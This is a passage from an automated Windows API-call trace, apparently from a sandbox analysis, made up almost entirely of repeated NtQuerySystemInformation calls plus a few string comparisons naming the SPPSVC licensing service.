SystemInformation=0xc751dfe6f0, Length=0x38, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe570, Length=0x20, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe500, Length=0x20, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe500, Length=0x20, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea30, Length=0x50, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea30, Length=0x50, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea30, Length=0x50, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe920, Length=0x50, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe920, Length=0x50, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe920, Length=0x50, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe920, Length=0x50, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe850, Length=0x38, ResultLength=0x0) [0209.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x28, ResultLength=0x0) [0209.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x28, ResultLength=0x0) [0209.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x28, ResultLength=0x0) [0209.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6f0, Length=0x28, ResultLength=0x0) [0209.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe850, Length=0x38, ResultLength=0x0) [0209.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x28, ResultLength=0x0) [0209.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x28, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe850, Length=0x38, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x20, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x20, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x20, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x20, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe850, Length=0x38, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x20, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe660, Length=0x20, ResultLength=0x0) [0209.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe660, Length=0x20, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea30, Length=0x50, ResultLength=0x0) [0209.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea30, Length=0x50, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea30, Length=0x50, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe920, Length=0x50, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe920, Length=0x50, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe920, Length=0x50, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe920, Length=0x50, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe850, Length=0x38, ResultLength=0x0) [0209.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x28, ResultLength=0x0) [0209.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x28, ResultLength=0x0) [0209.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x28, ResultLength=0x0) [0209.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6f0, Length=0x28, ResultLength=0x0) [0209.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe850, Length=0x38, ResultLength=0x0) [0209.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x28, ResultLength=0x0) [0209.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x28, ResultLength=0x0) [0209.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe850, Length=0x38, ResultLength=0x0) [0209.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x20, ResultLength=0x0) [0209.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x20, ResultLength=0x0) [0209.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x20, ResultLength=0x0) [0209.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x20, ResultLength=0x0) [0209.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe850, Length=0x38, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x20, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe660, Length=0x20, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe660, Length=0x20, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae0, Length=0x50, ResultLength=0x0) [0209.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea60, Length=0x28, ResultLength=0x0) [0209.849] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0209.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae0, Length=0x50, ResultLength=0x0) [0209.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae0, Length=0x50, ResultLength=0x0) [0209.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae0, Length=0x50, ResultLength=0x0) [0209.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0209.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x28, ResultLength=0x0) [0209.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x28, ResultLength=0x0) [0209.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x28, ResultLength=0x0) [0209.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8b0, Length=0x28, ResultLength=0x0) [0209.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0209.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe930, Length=0x28, ResultLength=0x0) [0209.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe930, Length=0x28, ResultLength=0x0) [0209.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x20, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x20, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x20, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x20, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x20, ResultLength=0x0) [0209.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe820, Length=0x20, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe820, Length=0x20, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae0, Length=0x50, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea60, Length=0x28, ResultLength=0x0) [0209.858] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae0, Length=0x50, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae0, Length=0x50, ResultLength=0x0) [0209.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae0, Length=0x50, ResultLength=0x0) [0209.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0209.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x28, ResultLength=0x0) [0209.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x28, ResultLength=0x0) [0209.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x28, ResultLength=0x0) [0209.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8b0, Length=0x28, ResultLength=0x0) [0209.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0209.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe930, Length=0x28, ResultLength=0x0) [0209.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe930, Length=0x28, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, 